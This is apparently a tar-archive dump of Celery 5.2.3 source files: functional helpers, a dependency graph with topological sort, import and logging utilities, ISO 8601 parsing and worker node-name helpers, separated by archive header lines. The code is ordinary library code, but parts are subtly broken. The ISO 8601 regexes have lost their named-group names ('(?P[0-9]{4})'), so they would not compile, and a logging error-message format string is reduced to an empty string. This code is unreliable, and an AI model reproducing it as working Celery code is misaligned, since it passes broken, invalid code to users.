while holding self.lock. Note that doing the cleanup here isn't a # good idea, _remove_receiver() will be called as a side effect of # garbage collection, and so the call can happen wh ile we are already # holding self.lock. 
self._dead_receivers = True def __repr__(self): """``repr(signal)``.""" return f'<{type(self).__name__}: {self.name} providing_args={self.providing_args!r}>' def __str__(self): """``str(signal)``.""" return repr(self) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/functional.py0000664000175000017500000002676200000000000020051 0ustar00asifasif00000000000000"""Functional-style utilities.""" import inspect import sys from collections import UserList from functools import partial from itertools import islice, tee, zip_longest from kombu.utils.functional import (LRUCache, dictfilter, is_list, lazy, maybe_evaluate, maybe_list, memoize) from vine import promise __all__ = ( 'LRUCache', 'is_list', 'maybe_list', 'memoize', 'mlazy', 'noop', 'first', 'firstmethod', 'chunks', 'padlist', 'mattrgetter', 'uniq', 'regen', 'dictfilter', 'lazy', 'maybe_evaluate', 'head_from_fun', 'maybe', 'fun_accepts_kwargs', ) FUNHEAD_TEMPLATE = """ def {fun_name}({fun_args}): return {fun_value} """ class DummyContext: def __enter__(self): return self def __exit__(self, *exc_info): pass class mlazy(lazy): """Memoized lazy evaluation. The function is only evaluated once, every subsequent access will return the same value. """ #: Set to :const:`True` after the object has been evaluated. evaluated = False _value = None def evaluate(self): if not self.evaluated: self._value = super().evaluate() self.evaluated = True return self._value def noop(*args, **kwargs): """No operation. Takes any arguments/keyword arguments and does nothing. """ def pass1(arg, *args, **kwargs): """Return the first positional argument.""" return arg def evaluate_promises(it): for value in it: if isinstance(value, promise): value = value() yield value def first(predicate, it): """Return the first element in ``it`` that ``predicate`` accepts. If ``predicate`` is None it will return the first item that's not :const:`None`. """ return next( (v for v in evaluate_promises(it) if ( predicate(v) if predicate is not None else v is not None)), None, ) def firstmethod(method, on_call=None): """Multiple dispatch. Return a function that with a list of instances, finds the first instance that gives a value for the given method. The list can also contain lazy instances (:class:`~kombu.utils.functional.lazy`.) """ def _matcher(it, *args, **kwargs): for obj in it: try: meth = getattr(maybe_evaluate(obj), method) reply = (on_call(meth, *args, **kwargs) if on_call else meth(*args, **kwargs)) except AttributeError: pass else: if reply is not None: return reply return _matcher def chunks(it, n): """Split an iterator into chunks with `n` elements each. Warning: ``it`` must be an actual iterator, if you pass this a concrete sequence will get you repeating elements. So ``chunks(iter(range(1000)), 10)`` is fine, but ``chunks(range(1000), 10)`` is not. Example: # n == 2 >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 2) >>> list(x) [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]] # n == 3 >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 3) >>> list(x) [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]] """ for item in it: yield [item] + list(islice(it, n - 1)) def padlist(container, size, default=None): """Pad list with default elements. Example: >>> first, last, city = padlist(['George', 'Costanza', 'NYC'], 3) ('George', 'Costanza', 'NYC') >>> first, last, city = padlist(['George', 'Costanza'], 3) ('George', 'Costanza', None) >>> first, last, city, planet = padlist( ... 
['George', 'Costanza', 'NYC'], 4, default='Earth', ... ) ('George', 'Costanza', 'NYC', 'Earth') """ return list(container)[:size] + [default] * (size - len(container)) def mattrgetter(*attrs): """Get attributes, ignoring attribute errors. Like :func:`operator.itemgetter` but return :const:`None` on missing attributes instead of raising :exc:`AttributeError`. """ return lambda obj: {attr: getattr(obj, attr, None) for attr in attrs} def uniq(it): """Return all unique elements in ``it``, preserving order.""" seen = set() return (seen.add(obj) or obj for obj in it if obj not in seen) def lookahead(it): """Yield pairs of (current, next) items in `it`. `next` is None if `current` is the last item. Example: >>> list(lookahead(x for x in range(6))) [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] """ a, b = tee(it) next(b, None) return zip_longest(a, b) def regen(it): """Convert iterator to an object that can be consumed multiple times. ``Regen`` takes any iterable, and if the object is an generator it will cache the evaluated list on first access, so that the generator can be "consumed" multiple times. """ if isinstance(it, (list, tuple)): return it return _regen(it) class _regen(UserList, list): # must be subclass of list so that json can encode. def __init__(self, it): # pylint: disable=super-init-not-called # UserList creates a new list and sets .data, so we don't # want to call init here. self.__it = it self.__consumed = [] self.__done = False def __reduce__(self): return list, (self.data,) def __length_hint__(self): return self.__it.__length_hint__() def __lookahead_consume(self, limit=None): if not self.__done and (limit is None or limit > 0): it = iter(self.__it) try: now = next(it) except StopIteration: return self.__consumed.append(now) # Maintain a single look-ahead to ensure we set `__done` when the # underlying iterator gets exhausted while not self.__done: try: next_ = next(it) self.__consumed.append(next_) except StopIteration: self.__done = True break finally: yield now now = next_ # We can break out when `limit` is exhausted if limit is not None: limit -= 1 if limit <= 0: break def __iter__(self): yield from self.__consumed yield from self.__lookahead_consume() def __getitem__(self, index): if index < 0: return self.data[index] # Consume elements up to the desired index prior to attempting to # access it from within `__consumed` consume_count = index - len(self.__consumed) + 1 for _ in self.__lookahead_consume(limit=consume_count): pass return self.__consumed[index] def __bool__(self): if len(self.__consumed): return True try: next(iter(self)) except StopIteration: return False else: return True @property def data(self): if not self.__done: self.__consumed.extend(self.__it) self.__done = True return self.__consumed def __repr__(self): return "<{}: [{}{}]>".format( self.__class__.__name__, ", ".join(repr(e) for e in self.__consumed), "..." 
if not self.__done else "", ) def _argsfromspec(spec, replace_defaults=True): if spec.defaults: split = len(spec.defaults) defaults = (list(range(len(spec.defaults))) if replace_defaults else spec.defaults) positional = spec.args[:-split] optional = list(zip(spec.args[-split:], defaults)) else: positional, optional = spec.args, [] varargs = spec.varargs varkw = spec.varkw if spec.kwonlydefaults: kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys()) if replace_defaults: kwonlyargs_optional = [ (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys()) ] else: kwonlyargs_optional = list(spec.kwonlydefaults.items()) else: kwonlyargs, kwonlyargs_optional = spec.kwonlyargs, [] return ', '.join(filter(None, [ ', '.join(positional), ', '.join(f'{k}={v}' for k, v in optional), f'*{varargs}' if varargs else None, '*' if (kwonlyargs or kwonlyargs_optional) and not varargs else None, ', '.join(kwonlyargs) if kwonlyargs else None, ', '.join(f'{k}="{v}"' for k, v in kwonlyargs_optional), f'**{varkw}' if varkw else None, ])) def head_from_fun(fun, bound=False, debug=False): """Generate signature function from actual function.""" # we could use inspect.Signature here, but that implementation # is very slow since it implements the argument checking # in pure-Python. Instead we use exec to create a new function # with an empty body, meaning it has the same performance as # as just calling a function. is_function = inspect.isfunction(fun) is_callable = hasattr(fun, '__call__') is_cython = fun.__class__.__name__ == 'cython_function_or_method' is_method = inspect.ismethod(fun) if not is_function and is_callable and not is_method and not is_cython: name, fun = fun.__class__.__name__, fun.__call__ else: name = fun.__name__ definition = FUNHEAD_TEMPLATE.format( fun_name=name, fun_args=_argsfromspec(inspect.getfullargspec(fun)), fun_value=1, ) if debug: # pragma: no cover print(definition, file=sys.stderr) namespace = {'__name__': fun.__module__} # pylint: disable=exec-used # Tasks are rarely, if ever, created at runtime - exec here is fine. exec(definition, namespace) result = namespace[name] result._source = definition if bound: return partial(result, object()) return result def arity_greater(fun, n): argspec = inspect.getfullargspec(fun) return argspec.varargs or len(argspec.args) > n def fun_takes_argument(name, fun, position=None): spec = inspect.getfullargspec(fun) return ( spec.varkw or spec.varargs or (len(spec.args) >= position if position else name in spec.args) ) def fun_accepts_kwargs(fun): """Return true if function accepts arbitrary keyword arguments.""" return any( p for p in inspect.signature(fun).parameters.values() if p.kind == p.VAR_KEYWORD ) def maybe(typ, val): """Call typ on value if val is defined.""" return typ(val) if val is not None else val def seq_concat_item(seq, item): """Return copy of sequence seq with item added. Returns: Sequence: if seq is a tuple, the result will be a tuple, otherwise it depends on the implementation of ``__add__``. """ return seq + (item,) if isinstance(seq, tuple) else seq + [item] def seq_concat_seq(a, b): """Concatenate two sequences: ``a + b``. Returns: Sequence: The return value will depend on the largest sequence - if b is larger and is a tuple, the return value will be a tuple. - if a is larger and is a list, the return value will be a list, """ # find the type of the largest sequence prefer = type(max([a, b], key=len)) # convert the smallest list to the type of the largest sequence. 
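    # Illustrative sketch of the resulting types (values made up):
    #   seq_concat_seq((1, 2), [3, 4, 5])  -> [1, 2, 3, 4, 5]
    #   seq_concat_seq([1, 2, 3], (4,))    -> [1, 2, 3, 4]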
if not isinstance(a, prefer): a = prefer(a) if not isinstance(b, prefer): b = prefer(b) return a + b ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/graph.py0000664000175000017500000002152100000000000016774 0ustar00asifasif00000000000000"""Dependency graph implementation.""" from collections import Counter from textwrap import dedent from kombu.utils.encoding import bytes_to_str, safe_str __all__ = ('DOT', 'CycleError', 'DependencyGraph', 'GraphFormatter') class DOT: """Constants related to the dot format.""" HEAD = dedent(""" {IN}{type} {id} {{ {INp}graph [{attrs}] """) ATTR = '{name}={value}' NODE = '{INp}"{0}" [{attrs}]' EDGE = '{INp}"{0}" {dir} "{1}" [{attrs}]' ATTRSEP = ', ' DIRS = {'graph': '--', 'digraph': '->'} TAIL = '{IN}}}' class CycleError(Exception): """A cycle was detected in an acyclic graph.""" class DependencyGraph: """A directed acyclic graph of objects and their dependencies. Supports a robust topological sort to detect the order in which they must be handled. Takes an optional iterator of ``(obj, dependencies)`` tuples to build the graph from. Warning: Does not support cycle detection. """ def __init__(self, it=None, formatter=None): self.formatter = formatter or GraphFormatter() self.adjacent = {} if it is not None: self.update(it) def add_arc(self, obj): """Add an object to the graph.""" self.adjacent.setdefault(obj, []) def add_edge(self, A, B): """Add an edge from object ``A`` to object ``B``. I.e. ``A`` depends on ``B``. """ self[A].append(B) def connect(self, graph): """Add nodes from another graph.""" self.adjacent.update(graph.adjacent) def topsort(self): """Sort the graph topologically. Returns: List: of objects in the order in which they must be handled. """ graph = DependencyGraph() components = self._tarjan72() NC = { node: component for component in components for node in component } for component in components: graph.add_arc(component) for node in self: node_c = NC[node] for successor in self[node]: successor_c = NC[successor] if node_c != successor_c: graph.add_edge(node_c, successor_c) return [t[0] for t in graph._khan62()] def valency_of(self, obj): """Return the valency (degree) of a vertex in the graph.""" try: l = [len(self[obj])] except KeyError: return 0 for node in self[obj]: l.append(self.valency_of(node)) return sum(l) def update(self, it): """Update graph with data from a list of ``(obj, deps)`` tuples.""" tups = list(it) for obj, _ in tups: self.add_arc(obj) for obj, deps in tups: for dep in deps: self.add_edge(obj, dep) def edges(self): """Return generator that yields for all edges in the graph.""" return (obj for obj, adj in self.items() if adj) def _khan62(self): """Perform Khan's simple topological sort algorithm from '62. See https://en.wikipedia.org/wiki/Topological_sorting """ count = Counter() result = [] for node in self: for successor in self[node]: count[successor] += 1 ready = [node for node in self if not count[node]] while ready: node = ready.pop() result.append(node) for successor in self[node]: count[successor] -= 1 if count[successor] == 0: ready.append(successor) result.reverse() return result def _tarjan72(self): """Perform Tarjan's algorithm to find strongly connected components. 
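        Example:
            A small sketch (node values invented; this helper is internal
            and is normally reached via :meth:`topsort`)::

                g = DependencyGraph([(1, [2]), (2, [1]), (3, [])])
                g._tarjan72()  # -> [(1, 2), (3,)] -- one tuple per SCC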
See Also: :wikipedia:`Tarjan%27s_strongly_connected_components_algorithm` """ result, stack, low = [], [], {} def visit(node): if node in low: return num = len(low) low[node] = num stack_pos = len(stack) stack.append(node) for successor in self[node]: visit(successor) low[node] = min(low[node], low[successor]) if num == low[node]: component = tuple(stack[stack_pos:]) stack[stack_pos:] = [] result.append(component) for item in component: low[item] = len(self) for node in self: visit(node) return result def to_dot(self, fh, formatter=None): """Convert the graph to DOT format. Arguments: fh (IO): A file, or a file-like object to write the graph to. formatter (celery.utils.graph.GraphFormatter): Custom graph formatter to use. """ seen = set() draw = formatter or self.formatter def P(s): print(bytes_to_str(s), file=fh) def if_not_seen(fun, obj): if draw.label(obj) not in seen: P(fun(obj)) seen.add(draw.label(obj)) P(draw.head()) for obj, adjacent in self.items(): if not adjacent: if_not_seen(draw.terminal_node, obj) for req in adjacent: if_not_seen(draw.node, obj) P(draw.edge(obj, req)) P(draw.tail()) def format(self, obj): return self.formatter(obj) if self.formatter else obj def __iter__(self): return iter(self.adjacent) def __getitem__(self, node): return self.adjacent[node] def __len__(self): return len(self.adjacent) def __contains__(self, obj): return obj in self.adjacent def _iterate_items(self): return self.adjacent.items() items = iteritems = _iterate_items def __repr__(self): return '\n'.join(self.repr_node(N) for N in self) def repr_node(self, obj, level=1, fmt='{0}({1})'): output = [fmt.format(obj, self.valency_of(obj))] if obj in self: for other in self[obj]: d = fmt.format(other, self.valency_of(other)) output.append(' ' * level + d) output.extend(self.repr_node(other, level + 1).split('\n')[1:]) return '\n'.join(output) class GraphFormatter: """Format dependency graphs.""" _attr = DOT.ATTR.strip() _node = DOT.NODE.strip() _edge = DOT.EDGE.strip() _head = DOT.HEAD.strip() _tail = DOT.TAIL.strip() _attrsep = DOT.ATTRSEP _dirs = dict(DOT.DIRS) scheme = { 'shape': 'box', 'arrowhead': 'vee', 'style': 'filled', 'fontname': 'HelveticaNeue', } edge_scheme = { 'color': 'darkseagreen4', 'arrowcolor': 'black', 'arrowsize': 0.7, } node_scheme = {'fillcolor': 'palegreen3', 'color': 'palegreen4'} term_scheme = {'fillcolor': 'palegreen1', 'color': 'palegreen2'} graph_scheme = {'bgcolor': 'mintcream'} def __init__(self, root=None, type=None, id=None, indent=0, inw=' ' * 4, **scheme): self.id = id or 'dependencies' self.root = root self.type = type or 'digraph' self.direction = self._dirs[self.type] self.IN = inw * (indent or 0) self.INp = self.IN + inw self.scheme = dict(self.scheme, **scheme) self.graph_scheme = dict(self.graph_scheme, root=self.label(self.root)) def attr(self, name, value): value = f'"{value}"' return self.FMT(self._attr, name=name, value=value) def attrs(self, d, scheme=None): d = dict(self.scheme, **dict(scheme, **d or {}) if scheme else d) return self._attrsep.join( safe_str(self.attr(k, v)) for k, v in d.items() ) def head(self, **attrs): return self.FMT( self._head, id=self.id, type=self.type, attrs=self.attrs(attrs, self.graph_scheme), ) def tail(self): return self.FMT(self._tail) def label(self, obj): return obj def node(self, obj, **attrs): return self.draw_node(obj, self.node_scheme, attrs) def terminal_node(self, obj, **attrs): return self.draw_node(obj, self.term_scheme, attrs) def edge(self, a, b, **attrs): return self.draw_edge(a, b, **attrs) def _enc(self, s): 
return s.encode('utf-8', 'ignore') def FMT(self, fmt, *args, **kwargs): return self._enc(fmt.format( *args, **dict(kwargs, IN=self.IN, INp=self.INp) )) def draw_edge(self, a, b, scheme=None, attrs=None): return self.FMT( self._edge, self.label(a), self.label(b), dir=self.direction, attrs=self.attrs(attrs, self.edge_scheme), ) def draw_node(self, obj, scheme=None, attrs=None): return self.FMT( self._node, self.label(obj), attrs=self.attrs(attrs, scheme), ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/imports.py0000664000175000017500000001133200000000000017367 0ustar00asifasif00000000000000"""Utilities related to importing modules and symbols by name.""" import importlib import os import sys import warnings from contextlib import contextmanager from importlib import reload from kombu.utils.imports import symbol_by_name #: Billiard sets this when execv is enabled. #: We use it to find out the name of the original ``__main__`` #: module, so that we can properly rewrite the name of the #: task to be that of ``App.main``. MP_MAIN_FILE = os.environ.get('MP_MAIN_FILE') __all__ = ( 'NotAPackage', 'qualname', 'instantiate', 'symbol_by_name', 'cwd_in_path', 'find_module', 'import_from_cwd', 'reload_from_cwd', 'module_file', 'gen_task_name', ) class NotAPackage(Exception): """Raised when importing a package, but it's not a package.""" def qualname(obj): """Return object name.""" if not hasattr(obj, '__name__') and hasattr(obj, '__class__'): obj = obj.__class__ q = getattr(obj, '__qualname__', None) if '.' not in q: q = '.'.join((obj.__module__, q)) return q def instantiate(name, *args, **kwargs): """Instantiate class by name. See Also: :func:`symbol_by_name`. """ return symbol_by_name(name)(*args, **kwargs) @contextmanager def cwd_in_path(): """Context adding the current working directory to sys.path.""" cwd = os.getcwd() if cwd in sys.path: yield else: sys.path.insert(0, cwd) try: yield cwd finally: try: sys.path.remove(cwd) except ValueError: # pragma: no cover pass def find_module(module, path=None, imp=None): """Version of :func:`imp.find_module` supporting dots.""" if imp is None: imp = importlib.import_module with cwd_in_path(): try: return imp(module) except ImportError: # Raise a more specific error if the problem is that one of the # dot-separated segments of the module name is not a package. if '.' in module: parts = module.split('.') for i, part in enumerate(parts[:-1]): package = '.'.join(parts[:i + 1]) try: mpart = imp(package) except ImportError: # Break out and re-raise the original ImportError # instead. break try: mpart.__path__ except AttributeError: raise NotAPackage(package) raise def import_from_cwd(module, imp=None, package=None): """Import module, temporarily including modules in the current directory. Modules located in the current directory has precedence over modules located in `sys.path`. 
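    Example:
        A sketch, assuming a ``tasks.py`` module sits in the current
        working directory but not on :data:`sys.path`::

            from celery.utils.imports import import_from_cwd

            tasks = import_from_cwd('tasks')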
""" if imp is None: imp = importlib.import_module with cwd_in_path(): return imp(module, package=package) def reload_from_cwd(module, reloader=None): """Reload module (ensuring that CWD is in sys.path).""" if reloader is None: reloader = reload with cwd_in_path(): return reloader(module) def module_file(module): """Return the correct original file name of a module.""" name = module.__file__ return name[:-1] if name.endswith('.pyc') else name def gen_task_name(app, name, module_name): """Generate task name from name/module pair.""" module_name = module_name or '__main__' try: module = sys.modules[module_name] except KeyError: # Fix for manage.py shell_plus (Issue #366) module = None if module is not None: module_name = module.__name__ # - If the task module is used as the __main__ script # - we need to rewrite the module part of the task name # - to match App.main. if MP_MAIN_FILE and module.__file__ == MP_MAIN_FILE: # - see comment about :envvar:`MP_MAIN_FILE` above. module_name = '__main__' if module_name == '__main__' and app.main: return '.'.join([app.main, name]) return '.'.join(p for p in (module_name, name) if p) def load_extension_class_names(namespace): try: from pkg_resources import iter_entry_points except ImportError: # pragma: no cover return for ep in iter_entry_points(namespace): yield ep.name, ':'.join([ep.module_name, ep.attrs[0]]) def load_extension_classes(namespace): for name, class_name in load_extension_class_names(namespace): try: cls = symbol_by_name(class_name) except (ImportError, SyntaxError) as exc: warnings.warn( f'Cannot load {namespace} extension {class_name!r}: {exc!r}') else: yield name, cls ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/iso8601.py0000664000175000017500000000533000000000000017004 0ustar00asifasif00000000000000"""Parse ISO8601 dates. Originally taken from :pypi:`pyiso8601` (https://bitbucket.org/micktwomey/pyiso8601) Modified to match the behavior of ``dateutil.parser``: - raise :exc:`ValueError` instead of ``ParseError`` - return naive :class:`~datetime.datetime` by default - uses :class:`pytz.FixedOffset` This is the original License: Copyright (c) 2007 Michael Twomey Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sub-license, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" import re from datetime import datetime from pytz import FixedOffset __all__ = ('parse_iso8601',) # Adapted from http://delete.me.uk/2005/03/iso8601.html ISO8601_REGEX = re.compile( r'(?P[0-9]{4})(-(?P[0-9]{1,2})(-(?P[0-9]{1,2})' r'((?P.)(?P[0-9]{2}):(?P[0-9]{2})' r'(:(?P[0-9]{2})(\.(?P[0-9]+))?)?' r'(?PZ|(([-+])([0-9]{2}):([0-9]{2})))?)?)?)?' ) TIMEZONE_REGEX = re.compile( r'(?P[+-])(?P[0-9]{2}).(?P[0-9]{2})' ) def parse_iso8601(datestring): """Parse and convert ISO-8601 string to datetime.""" m = ISO8601_REGEX.match(datestring) if not m: raise ValueError('unable to parse date string %r' % datestring) groups = m.groupdict() tz = groups['timezone'] if tz == 'Z': tz = FixedOffset(0) elif tz: m = TIMEZONE_REGEX.match(tz) prefix, hours, minutes = m.groups() hours, minutes = int(hours), int(minutes) if prefix == '-': hours = -hours minutes = -minutes tz = FixedOffset(minutes + hours * 60) return datetime( int(groups['year']), int(groups['month']), int(groups['day']), int(groups['hour'] or 0), int(groups['minute'] or 0), int(groups['second'] or 0), int(groups['fraction'] or 0), tz ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/log.py0000664000175000017500000002115100000000000016453 0ustar00asifasif00000000000000"""Logging utilities.""" import logging import numbers import os import sys import threading import traceback from contextlib import contextmanager from typing import AnyStr, Sequence from kombu.log import LOG_LEVELS from kombu.log import get_logger as _get_logger from kombu.utils.encoding import safe_str from .term import colored __all__ = ( 'ColorFormatter', 'LoggingProxy', 'base_logger', 'set_in_sighandler', 'in_sighandler', 'get_logger', 'get_task_logger', 'mlevel', 'get_multiprocessing_logger', 'reset_multiprocessing_logger', 'LOG_LEVELS' ) _process_aware = False _in_sighandler = False MP_LOG = os.environ.get('MP_LOG', False) RESERVED_LOGGER_NAMES = {'celery', 'celery.task'} # Sets up our logging hierarchy. # # Every logger in the celery package inherits from the "celery" # logger, and every task logger inherits from the "celery.task" # logger. 
base_logger = logger = _get_logger('celery') def set_in_sighandler(value): """Set flag signifiying that we're inside a signal handler.""" global _in_sighandler _in_sighandler = value def iter_open_logger_fds(): seen = set() loggers = (list(logging.Logger.manager.loggerDict.values()) + [logging.getLogger(None)]) for l in loggers: try: for handler in l.handlers: try: if handler not in seen: # pragma: no cover yield handler.stream seen.add(handler) except AttributeError: pass except AttributeError: # PlaceHolder does not have handlers pass @contextmanager def in_sighandler(): """Context that records that we are in a signal handler.""" set_in_sighandler(True) try: yield finally: set_in_sighandler(False) def logger_isa(l, p, max=1000): this, seen = l, set() for _ in range(max): if this == p: return True else: if this in seen: raise RuntimeError( f'Logger {l.name!r} parents recursive', ) seen.add(this) this = this.parent if not this: break else: # pragma: no cover raise RuntimeError(f'Logger hierarchy exceeds {max}') return False def _using_logger_parent(parent_logger, logger_): if not logger_isa(logger_, parent_logger): logger_.parent = parent_logger return logger_ def get_logger(name): """Get logger by name.""" l = _get_logger(name) if logging.root not in (l, l.parent) and l is not base_logger: l = _using_logger_parent(base_logger, l) return l task_logger = get_logger('celery.task') worker_logger = get_logger('celery.worker') def get_task_logger(name): """Get logger for task module by name.""" if name in RESERVED_LOGGER_NAMES: raise RuntimeError(f'Logger name {name!r} is reserved!') return _using_logger_parent(task_logger, get_logger(name)) def mlevel(level): """Convert level name/int to log level.""" if level and not isinstance(level, numbers.Integral): return LOG_LEVELS[level.upper()] return level class ColorFormatter(logging.Formatter): """Logging formatter that adds colors based on severity.""" #: Loglevel -> Color mapping. COLORS = colored().names colors = { 'DEBUG': COLORS['blue'], 'WARNING': COLORS['yellow'], 'ERROR': COLORS['red'], 'CRITICAL': COLORS['magenta'], } def __init__(self, fmt=None, use_color=True): super().__init__(fmt) self.use_color = use_color def formatException(self, ei): if ei and not isinstance(ei, tuple): ei = sys.exc_info() r = super().formatException(ei) return r def format(self, record): msg = super().format(record) color = self.colors.get(record.levelname) # reset exception info later for other handlers... einfo = sys.exc_info() if record.exc_info == 1 else record.exc_info if color and self.use_color: try: # safe_str will repr the color object # and color will break on non-string objects # so need to reorder calls based on type. # Issue #427 try: if isinstance(msg, str): return str(color(safe_str(msg))) return safe_str(color(msg)) except UnicodeDecodeError: # pragma: no cover return safe_str(msg) # skip colors except Exception as exc: # pylint: disable=broad-except prev_msg, record.exc_info, record.msg = ( record.msg, 1, ''.format( type(msg), exc ), ) try: return super().format(record) finally: record.msg, record.exc_info = prev_msg, einfo else: return safe_str(msg) class LoggingProxy: """Forward file object to :class:`logging.Logger` instance. Arguments: logger (~logging.Logger): Logger instance to forward to. loglevel (int, str): Log level to use when logging messages. 
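    Example:
        Redirecting writes into a logger (a sketch; the logger name is
        arbitrary)::

            import logging
            from celery.utils.log import LoggingProxy, get_logger

            proxy = LoggingProxy(get_logger('celery.redirected'),
                                 loglevel=logging.WARNING)
            proxy.write('something happened\n')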
""" mode = 'w' name = None closed = False loglevel = logging.ERROR _thread = threading.local() def __init__(self, logger, loglevel=None): # pylint: disable=redefined-outer-name # Note that the logger global is redefined here, be careful changing. self.logger = logger self.loglevel = mlevel(loglevel or self.logger.level or self.loglevel) self._safewrap_handlers() def _safewrap_handlers(self): # Make the logger handlers dump internal errors to # :data:`sys.__stderr__` instead of :data:`sys.stderr` to circumvent # infinite loops. def wrap_handler(handler): # pragma: no cover class WithSafeHandleError(logging.Handler): def handleError(self, record): try: traceback.print_exc(None, sys.__stderr__) except OSError: pass # see python issue 5971 handler.handleError = WithSafeHandleError().handleError return [wrap_handler(h) for h in self.logger.handlers] def write(self, data): # type: (AnyStr) -> int """Write message to logging object.""" if _in_sighandler: safe_data = safe_str(data) print(safe_data, file=sys.__stderr__) return len(safe_data) if getattr(self._thread, 'recurse_protection', False): # Logger is logging back to this file, so stop recursing. return 0 if data and not self.closed: self._thread.recurse_protection = True try: safe_data = safe_str(data).rstrip('\n') if safe_data: self.logger.log(self.loglevel, safe_data) return len(safe_data) finally: self._thread.recurse_protection = False return 0 def writelines(self, sequence): # type: (Sequence[str]) -> None """Write list of strings to file. The sequence can be any iterable object producing strings. This is equivalent to calling :meth:`write` for each string. """ for part in sequence: self.write(part) def flush(self): # This object is not buffered so any :meth:`flush` # requests are ignored. pass def close(self): # when the object is closed, no write requests are # forwarded to the logging object anymore. self.closed = True def isatty(self): """Here for file support.""" return False def get_multiprocessing_logger(): """Return the multiprocessing logger.""" try: from billiard import util except ImportError: # pragma: no cover pass else: return util.get_logger() def reset_multiprocessing_logger(): """Reset multiprocessing logging setup.""" try: from billiard import util except ImportError: # pragma: no cover pass else: if hasattr(util, '_logger'): # pragma: no cover util._logger = None def current_process(): try: from billiard import process except ImportError: # pragma: no cover pass else: return process.current_process() def current_process_index(base=1): index = getattr(current_process(), 'index', None) return index + base if index is not None else index ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/nodenames.py0000664000175000017500000000545200000000000017651 0ustar00asifasif00000000000000"""Worker name utilities.""" import os import socket from functools import partial from kombu.entity import Exchange, Queue from .functional import memoize from .text import simple_format #: Exchange for worker direct queues. WORKER_DIRECT_EXCHANGE = Exchange('C.dq2') #: Format for worker direct queue names. WORKER_DIRECT_QUEUE_FORMAT = '{hostname}.dq2' #: Separator for worker node name and hostname. 
NODENAME_SEP = '@' NODENAME_DEFAULT = 'celery' gethostname = memoize(1, Cache=dict)(socket.gethostname) __all__ = ( 'worker_direct', 'gethostname', 'nodename', 'anon_nodename', 'nodesplit', 'default_nodename', 'node_format', 'host_format', ) def worker_direct(hostname): """Return the :class:`kombu.Queue` being a direct route to a worker. Arguments: hostname (str, ~kombu.Queue): The fully qualified node name of a worker (e.g., ``w1@example.com``). If passed a :class:`kombu.Queue` instance it will simply return that instead. """ if isinstance(hostname, Queue): return hostname return Queue( WORKER_DIRECT_QUEUE_FORMAT.format(hostname=hostname), WORKER_DIRECT_EXCHANGE, hostname, ) def nodename(name, hostname): """Create node name from name/hostname pair.""" return NODENAME_SEP.join((name, hostname)) def anon_nodename(hostname=None, prefix='gen'): """Return the nodename for this process (not a worker). This is used for e.g. the origin task message field. """ return nodename(''.join([prefix, str(os.getpid())]), hostname or gethostname()) def nodesplit(name): """Split node name into tuple of name/hostname.""" parts = name.split(NODENAME_SEP, 1) if len(parts) == 1: return None, parts[0] return parts def default_nodename(hostname): """Return the default nodename for this process.""" name, host = nodesplit(hostname or '') return nodename(name or NODENAME_DEFAULT, host or gethostname()) def node_format(s, name, **extra): """Format worker node name (name@host.com).""" shortname, host = nodesplit(name) return host_format( s, host, shortname or NODENAME_DEFAULT, p=name, **extra) def _fmt_process_index(prefix='', default='0'): from .log import current_process_index index = current_process_index() return f'{prefix}{index}' if index else default _fmt_process_index_with_prefix = partial(_fmt_process_index, '-', '') def host_format(s, host=None, name=None, **extra): """Format host %x abbreviations.""" host = host or gethostname() hname, _, domain = host.partition('.') name = name or hname keys = dict({ 'h': host, 'n': name, 'd': domain, 'i': _fmt_process_index, 'I': _fmt_process_index_with_prefix, }, **extra) return simple_format(s, keys) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/objects.py0000664000175000017500000001016700000000000017330 0ustar00asifasif00000000000000"""Object related utilities, including introspection, etc.""" from functools import reduce __all__ = ('Bunch', 'FallbackContext', 'getitem_property', 'mro_lookup') class Bunch: """Object that enables you to modify attributes.""" def __init__(self, **kwargs): self.__dict__.update(kwargs) def mro_lookup(cls, attr, stop=None, monkey_patched=None): """Return the first node by MRO order that defines an attribute. Arguments: cls (Any): Child class to traverse. attr (str): Name of attribute to find. stop (Set[Any]): A set of types that if reached will stop the search. monkey_patched (Sequence): Use one of the stop classes if the attributes module origin isn't in this list. Used to detect monkey patched attributes. Returns: Any: The attribute value, or :const:`None` if not found. 
